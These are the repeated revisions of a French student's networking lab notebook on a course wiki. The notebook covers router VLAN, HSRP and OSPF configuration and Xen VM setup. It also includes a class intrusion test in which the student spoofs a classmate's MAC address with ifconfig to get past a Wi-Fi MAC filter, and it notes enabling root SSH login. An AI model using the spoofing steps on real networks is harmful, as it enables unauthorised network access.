donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1<br /> <br /> <pre><br /> Avec une simple ligne de code : je change mon adresse MAC !<br /> - ifconfig wlan0 down<br /> - ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1 //adresse mac de Gauthier<br /> - ifconfig wlan0 up<br /> </pre><br /> <br /> MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.<br /> <br /> <br /> <h3>Cassage de clef WEP d'un point d'accès Wifi</h3><br /> <br /> <h3>Cassage de mot de passe WPA-PSK par force brute</h3><br /> <br /> '''''<h2>Installation des systèmes d'exploitation</h2>'''''<br /> ----<br /> <br /> J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net<br /> <br /> <pre><br /> Code :<br /> xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen<br /> <br /> nano /etc/ssh/sshd_config allow root login (without password)->yes<br /> apt -get purge network-manager systemd<br /> init tab ==> 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0<br /> </pre><br /> <br /> <pre><br /> Hostname : Werewolf<br /> Distribution : jessie<br /> MAC Address : 00:16:3E:25:96:A7<br /> IP Address(es) : 193.48.57.18<br /> RSA Fingerprint : 4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e<br /> Root Password : Il ne serait plus secret sinon ;)<br /> </pre><br /> <br /> A RETENIR :<br /> <pre><br /> Pour ouvrir la machine : xl console Werewolf<br /> Pour la fermer : halt<br /> </pre><br /> <br /> '''''<h2>Services Internet</h2>'''''<br /> ----<br /> '''''<h2>Réalisation</h2>'''''<br /> ----</div>

Ebourre https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&diff=22765 TP sysres IMA2a5 2015/2016 G6 2015-11-06T09:42:02Z

<p>Ebourre : </p> <hr /> <div><h1> Projet Systèmes&Réseaux IMA2A5 </h1><br /> ----<br /> <br /> Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. <br /><br /> <br /> Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.<br /> <br /><br /> <br /> <h2> Architecture réseau </h2><br /> ----<br /> <br /> Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.<br /> <br /> La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.<br /> <center><br /> <table><br /> <tr><th>'''N° du VLAN'''</th><th>'''Nom'''</th><th>'''Adresse IP'''</th><th>'''Adresse Routeur 1'''</th><th>'''Adresse Passerelle'''</th></tr><br /> <tr><th>2</th><th>Puduc</th><th>172.20.100.0/24</th><th>172.20.100.252</th><th>172.20.100.254</th></tr><br /> <tr><th>3</th><th>Nounours</th><th>172.20.101.0/24</th><th>172.20.101.252</th><th>172.20.101.254</th></tr><br /> <tr><th>4</th><th>Jeuno</th><th>172.20.102.0/24</th><th>172.20.102.252</th><th>172.20.102.254</th></tr><br /> <tr><th>5</th><th>Relax</th><th>172.20.103.0/24</th><th>172.20.103.252</th><th>172.20.103.254</th></tr><br /> <tr><th>6</th><th>John</th><th>172.20.104.0/24</th><th>172.20.104.252</th><th>172.20.104.254</th></tr><br /> <tr><th>7</th><th>Loki</th><th>172.20.105.0/24</th><th>172.20.105.252</th><th>172.20.105.254</th></tr><br /> <tr><th>8</th><th>Papy</th><th>172.20.106.0/24</th><th>172.20.106.252</th><th>172.20.106.254</th></tr><br /> <tr><th>10</th><th>Hub</th><th>193.48.57.176/28</th><th>193.48.57.188</th><th>193.48.57.190</th></tr><br /> <tr><th>131</th><th>Interco</th><th>192.168.222.8/29</th><th>192.168.222.9</th><th>X</th></tr><br /> </table><br /> </center><br /> <br /> Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera "prise" par le routeur le plus prioritaire. <br /> <br /> <pre><br /> Code sous minicom pour réaliser l'adressage des VLan's: <br /> <br /> - en // passage en mode administrateur<br /> - conf t <br /> - int vlan2 //modification du vlan2<br /> - ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2<br /> - standby 1 ip 172.20.100.254 // adresse de passerelle<br /> - standby 1 preempt //Utilisation du protocole HSRP nécessaire à la redondance<br /> - standby 1 priority 110 // priorité pour la prise de l'adresse passerelle<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un nom à un VLAN: <br /> <br /> - conf t <br /> - vlan8<br /> - name Papy<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un port (içi pour internet)<br /> <br /> - conf t <br /> - interface GigabitEthernet 0/47 // on agit sur ce port<br /> - Sitchport mode access<br /> - switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet<br /> - no shut<br /> </pre><br /> <br /> <pre><br /> Code pour l'échange automatique des tables de routages :<br /> <br /> - Switch(config)#router ospf 1<br /> -Switch(config-router)#log-adjacency-changes<br /> -Switch(config-router)#router-id 172.20.100.252<br /> -Switch(config-router)#log-adjacency-changes <br /> -Switch(config-router)#summary-address 172.20.96.0 255.255.240.0<br /> -Switch(config-router)#summary-address 193.48.57.176 255.255.255.240<br /> -Switch(config-router)#redistribute connected metric 20 subnets <br /> -Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2<br /> </pre><br /> <br /> Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.<br /> <br /> <br /> <h2> Tests d'intrusion </h2><br /> ----<br /> <br /> <h3>Intrusion par changement d'adresse MAC</h3><br /> <br /> Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.<br /> En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. <br /> <br /> RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. <br /> <br /> SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1<br /> <br /> <pre><br /> Avec une simple ligne de code : je change mon adresse MAC !<br /> - ifconfig wlan0 down<br /> - ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1 //adresse mac de Gauthier<br /> - ifconfig wlan0 up<br /> </pre><br /> <br /> MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.<br /> <br /> <br /> <h3>Cassage de clef WEP d'un point d'accès Wifi</h3><br /> <br /> <h3>Cassage de mot de passe WPA-PSK par force brute</h3><br /> <br /> <h2>Installation des systèmes d'exploitation</h2><br /> ----<br /> <br /> J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net<br /> <br /> <pre><br /> Code :<br /> xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen<br /> <br /> nano /etc/ssh/sshd_config allow root login (without password)->yes<br /> apt -get purge network-manager systemd<br /> init tab ==> 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0<br /> </pre><br /> <br /> <pre><br /> Hostname : Werewolf<br /> Distribution : jessie<br /> MAC Address : 00:16:3E:25:96:A7<br /> IP Address(es) : 193.48.57.18<br /> RSA Fingerprint : 4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e<br /> Root Password : Il ne serait plus secret sinon ;)<br /> </pre><br /> <br /> A RETENIR :<br /> <pre><br /> Pour ouvrir la machine : xl console Werewolf<br /> Pour la fermer : halt<br /> </pre><br /> <br /> <h2>Services Internet</h2><br /> ----<br /> <br /> <h2>Réalisation</h2><br /> ----</div>

Ebourre https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&diff=22697 TP sysres IMA2a5 2015/2016 G6 2015-11-03T21:58:36Z

<p>Ebourre : </p> <hr /> <div><h1> Projet Systèmes&Réseaux IMA2A5 </h1><br /> ----<br /> <br /> Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. <br /><br /> <br /> Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.<br /> <br /><br /> <br /> <h2> 1ère Étape : La configuration du routeur </h2><br /> ----<br /> <br /> Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.<br /> <br /> La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.<br /> <center><br /> <table><br /> <tr><th>'''N° du VLAN'''</th><th>'''Nom'''</th><th>'''Adresse IP'''</th><th>'''Adresse Routeur 1'''</th><th>'''Adresse Passerelle'''</th></tr><br /> <tr><th>2</th><th>Puduc</th><th>172.20.100.0/24</th><th>172.20.100.252</th><th>172.20.100.254</th></tr><br /> <tr><th>3</th><th>Nounours</th><th>172.20.101.0/24</th><th>172.20.101.252</th><th>172.20.101.254</th></tr><br /> <tr><th>4</th><th>Jeuno</th><th>172.20.102.0/24</th><th>172.20.102.252</th><th>172.20.102.254</th></tr><br /> <tr><th>5</th><th>Relax</th><th>172.20.103.0/24</th><th>172.20.103.252</th><th>172.20.103.254</th></tr><br /> <tr><th>6</th><th>John</th><th>172.20.104.0/24</th><th>172.20.104.252</th><th>172.20.104.254</th></tr><br /> <tr><th>7</th><th>Loki</th><th>172.20.105.0/24</th><th>172.20.105.252</th><th>172.20.105.254</th></tr><br /> <tr><th>8</th><th>Papy</th><th>172.20.106.0/24</th><th>172.20.106.252</th><th>172.20.106.254</th></tr><br /> <tr><th>10</th><th>Hub</th><th>193.48.57.176/28</th><th>193.48.57.188</th><th>193.48.57.190</th></tr><br /> <tr><th>131</th><th>Interco</th><th>192.168.222.8/29</th><th>192.168.222.9</th><th>X</th></tr><br /> </table><br /> </center><br /> <br /> Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera "prise" par le routeur le plus prioritaire. <br /> <br /> <pre><br /> Code sous minicom pour réaliser l'adressage des VLan's: <br /> <br /> - en // passage en mode administrateur<br /> - conf t <br /> - int vlan2 //modification du vlan2<br /> - ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2<br /> - standby 1 ip 172.20.100.254 // adresse de passerelle<br /> - standby 1 preempt //Utilisation du protocole HSRP nécessaire à la redondance<br /> - standby 1 priority 110 // priorité pour la prise de l'adresse passerelle<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un nom à un VLAN: <br /> <br /> - conf t <br /> - vlan8<br /> - name Papy<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un port (içi pour internet)<br /> <br /> - conf t <br /> - interface GigabitEthernet 0/47 // on agit sur ce port<br /> - Sitchport mode access<br /> - switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet<br /> - no shut<br /> </pre><br /> <br /> <pre><br /> Code pour l'échange automatique des tables de routages :<br /> <br /> - Switch(config)#router ospf 1<br /> -Switch(config-router)#log-adjacency-changes<br /> -Switch(config-router)#router-id 172.20.100.252<br /> -Switch(config-router)#log-adjacency-changes <br /> -Switch(config-router)#summary-address 172.20.96.0 255.255.240.0<br /> -Switch(config-router)#summary-address 193.48.57.176 255.255.255.240<br /> -Switch(config-router)#redistribute connected metric 20 subnets <br /> -Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2<br /> </pre><br /> <br /> Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.<br /> <br /> <br /> <h2> 2ème Étape : Travail commun </h2><br /> ----<br /> <br /> <h3>Test d'intrusion</h3><br /> Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.<br /> En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. <br /> <br /> RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. <br /> <br /> SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1<br /> <br /> <pre><br /> Avec une simple ligne de code : je change mon adresse MAC !<br /> - ifconfig wlan0 down<br /> - ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1 //adresse mac de Gauthier<br /> - ifconfig wlan0 up<br /> </pre><br /> <br /> MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.<br /> <br /> <br /> <h3>Création de la machine virtuelle</h3><br /> <br /> J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net<br /> <br /> <pre><br /> Code :<br /> xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen<br /> <br /> nano /etc/ssh/sshd_config allow root login (without password)->yes<br /> apt -get purge network-manager systemd<br /> init tab ==> 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0<br /> </pre><br /> <br /> <pre><br /> Hostname : Werewolf<br /> Distribution : jessie<br /> MAC Address : 00:16:3E:25:96:A7<br /> IP Address(es) : 193.48.57.18<br /> RSA Fingerprint : 4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e<br /> Root Password : Il ne serait plus secret sinon ;)<br /> </pre><br /> <br /> A RETENIR :<br /> <pre><br /> Pour ouvrir la machine : xl console Werewolf<br /> Pour la fermer : halt<br /> </pre></div>

Ebourre https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&diff=22696 TP sysres IMA2a5 2015/2016 G6 2015-11-03T21:48:13Z

<p>Ebourre : </p> <hr /> <div><h1> Projet Systèmes&Réseaux IMA2A5 </h1><br /> ----<br /> <br /> Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. <br /><br /> <br /> Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.<br /> <br /><br /> <br /> <h2> 1ère Étape : La configuration du routeur </h2><br /> ----<br /> <br /> Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.<br /> <br /> La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.<br /> <center><br /> <table><br /> <tr><th>'''N° du VLAN'''</th><th>'''Nom'''</th><th>'''Adresse IP'''</th><th>'''Adresse Routeur 1'''</th><th>'''Adresse Passerelle'''</th></tr><br /> <tr><th>2</th><th>Puduc</th><th>172.20.100.0/24</th><th>172.20.100.252</th><th>172.20.100.254</th></tr><br /> <tr><th>3</th><th>Nounours</th><th>172.20.101.0/24</th><th>172.20.101.252</th><th>172.20.101.254</th></tr><br /> <tr><th>4</th><th>Jeuno</th><th>172.20.102.0/24</th><th>172.20.102.252</th><th>172.20.102.254</th></tr><br /> <tr><th>5</th><th>Relax</th><th>172.20.103.0/24</th><th>172.20.103.252</th><th>172.20.103.254</th></tr><br /> <tr><th>6</th><th>John</th><th>172.20.104.0/24</th><th>172.20.104.252</th><th>172.20.104.254</th></tr><br /> <tr><th>7</th><th>Loki</th><th>172.20.105.0/24</th><th>172.20.105.252</th><th>172.20.105.254</th></tr><br /> <tr><th>8</th><th>Papy</th><th>172.20.106.0/24</th><th>172.20.106.252</th><th>172.20.106.254</th></tr><br /> <tr><th>10</th><th>Hub</th><th>193.48.57.176/28</th><th>193.48.57.188</th><th>193.48.57.190</th></tr><br /> <tr><th>131</th><th>Interco</th><th>192.168.222.8/29</th><th>192.168.222.9</th><th>X</th></tr><br /> </table><br /> </center><br /> <br /> Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera "prise" par le routeur le plus prioritaire. <br /> <br /> <pre><br /> Code sous minicom pour réaliser l'adressage des VLan's: <br /> <br /> - en // passage en mode administrateur<br /> - conf t <br /> - int vlan2 //modification du vlan2<br /> - ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2<br /> - standby 1 ip 172.20.100.254 // adresse de passerelle<br /> - standby 1 preempt //Utilisation du protocole HSRP nécessaire à la redondance<br /> - standby 1 priority 110 // priorité pour la prise de l'adresse passerelle<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un nom à un VLAN: <br /> <br /> - conf t <br /> - vlan8<br /> - name Papy<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un port (içi pour internet)<br /> <br /> - conf t <br /> - interface GigabitEthernet 0/47 // on agit sur ce port<br /> - Sitchport mode access<br /> - switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet<br /> - no shut<br /> </pre><br /> <br /> <pre><br /> Code pour l'échange automatique des tables de routages :<br /> <br /> - Switch(config)#router ospf 1<br /> -Switch(config-router)#log-adjacency-changes<br /> -Switch(config-router)#router-id 172.20.100.252<br /> -Switch(config-router)#log-adjacency-changes <br /> -Switch(config-router)#summary-address 172.20.96.0 255.255.240.0<br /> -Switch(config-router)#summary-address 193.48.57.176 255.255.255.240<br /> -Switch(config-router)#redistribute connected metric 20 subnets <br /> -Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2<br /> </pre><br /> <br /> Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.<br /> <br /> <br /> <h2> 2ème Étape : Travail commun </h2><br /> ----<br /> <br /> <h3>Test d'intrusion</h3><br /> Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.<br /> En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. <br /> <br /> RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. <br /> <br /> SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1<br /> <br /> <pre><br /> Avec une simple ligne de code : je change mon adresse MAC !<br /> - ifconfig wlan0 down<br /> - ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1 //adresse mac de Gauthier<br /> - ifconfig wlan0 up<br /> </pre><br /> <br /> MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.</div>

Ebourre https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&diff=22695 TP sysres IMA2a5 2015/2016 G6 2015-11-03T20:48:49Z

<p>Ebourre : </p> <hr /> <div><h1> Projet Systèmes&Réseaux IMA2A5 </h1><br /> <br /> Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. <br /><br /> <br /> Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.<br /> <br /><br /> <br /> <h2> 1ère Étape : La configuration du routeur </h2><br /> <br /> Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.<br /> <br /> La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.<br /> <center><br /> <table><br /> <tr><th>'''N° du VLAN'''</th><th>'''Nom'''</th><th>'''Adresse IP'''</th><th>'''Adresse Routeur 1'''</th><th>'''Adresse Passerelle'''</th></tr><br /> <tr><th>2</th><th>Puduc</th><th>172.20.100.0/24</th><th>172.20.100.252</th><th>172.20.100.254</th></tr><br /> <tr><th>3</th><th>Nounours</th><th>172.20.101.0/24</th><th>172.20.101.252</th><th>172.20.101.254</th></tr><br /> <tr><th>4</th><th>Jeuno</th><th>172.20.102.0/24</th><th>172.20.102.252</th><th>172.20.102.254</th></tr><br /> <tr><th>5</th><th>Relax</th><th>172.20.103.0/24</th><th>172.20.103.252</th><th>172.20.103.254</th></tr><br /> <tr><th>6</th><th>John</th><th>172.20.104.0/24</th><th>172.20.104.252</th><th>172.20.104.254</th></tr><br /> <tr><th>7</th><th>Loki</th><th>172.20.105.0/24</th><th>172.20.105.252</th><th>172.20.105.254</th></tr><br /> <tr><th>8</th><th>Papy</th><th>172.20.106.0/24</th><th>172.20.106.252</th><th>172.20.106.254</th></tr><br /> <tr><th>10</th><th>Hub</th><th>193.48.57.176/28</th><th>193.48.57.188</th><th>193.48.57.190</th></tr><br /> <tr><th>131</th><th>Interco</th><th>192.168.222.8/29</th><th>192.168.222.9</th><th>X</th></tr><br /> </table><br /> </center></div>

Ebourre https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016&diff=22694 TP sysres IMA2a5 2015/2016 2015-11-03T20:01:58Z

<p>Ebourre : </p> <hr /> <div>Merci de référencer votre cahier de travaux pratiques ici.<br /> <br /> == Répartition des binômes ==<br /> <br /> <table border="1"><br /> <tr><br /> <th>Cahier</th><br /> <th>Elèves</th><br /> <th>Tâche particulière</th><br /> </tr><br /> <tr><br /> <td>[[ TP sysres IMA2a5 2015/2016 G1 | Cahier groupe n°1]]</td><br /> <td> Clément Millet</td><br /> <td> Configuration routeur</td><br /> </tr><br /> <tr><br /> <td>[[ TP sysres IMA2a5 2015/2016 G2 | Cahier groupe n°2]]</td><br /> <td> Gauthier Ryckeboer</td><br /> <td> Configuration commutateur</td><br /> </tr><br /> <tr><br /> <td>[[ TP sysres IMA2a5 2015/2016 G3 | Cahier groupe n°3]]</td><br /> <td>Maxime Strunc</td><br /> <td>Point d'accès Wifi</td><br /> </tr><br /> <tr><br /> <td>[[ TP sysres IMA2a5 2015/2016 G4 | Cahier groupe n°4]]</td><br /> <td> Marouane ACHKRA</td><br /> <td> Point d'accès Wifi</td><br /> </tr><br /> <tr><br /> <td>[[ TP sysres IMA2a5 2015/2016 G5 | Cahier groupe n°5]]</td><br /> <td> Nicolas Gunst </td><br /> <td> configuration EtherChannel, Câblage, Bridge</td><br /> </tr><br /> <tr><br /> <td>[[ TP sysres IMA2a5 2015/2016 G6 | Cahier groupe n°6]]</td><br /> <td> Eric BOURRE</td><br /> <td> Configuration routeur</td><br /> </tr><br /> <tr><br /> <td>[[ TP sysres IMA2a5 2015/2016 G7 | Cahier groupe n°7]]</td><br /> <td> Nour ZERHOUNI</td><br /> <td> Configuration commutateur</td><br /> </tr><br /> </table></div>

Ebourre https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&diff=22507 TP sysres IMA2a5 2015/2016 G6 2015-10-27T19:25:07Z

<p>Ebourre : Page créée avec « <h1> Projet Systèmes&Réseaux IMA2A5 </h1> <h2> Projet Systèmes&Réseaux IMA2A5 </h2> Cet atelier consiste en la réalisation d'une maquette de réseau permettant de mani... »</p> <hr /> <div><h1> Projet Systèmes&Réseaux IMA2A5 </h1><br /> <br /> <h2> Projet Systèmes&Réseaux IMA2A5 </h2><br /> <br /> Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. <br /><br /> <br /> Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.<br /> <br /><br /> <br /> <h2> 1ère Étape : La configuration du routeur </h2></div>

Ebourre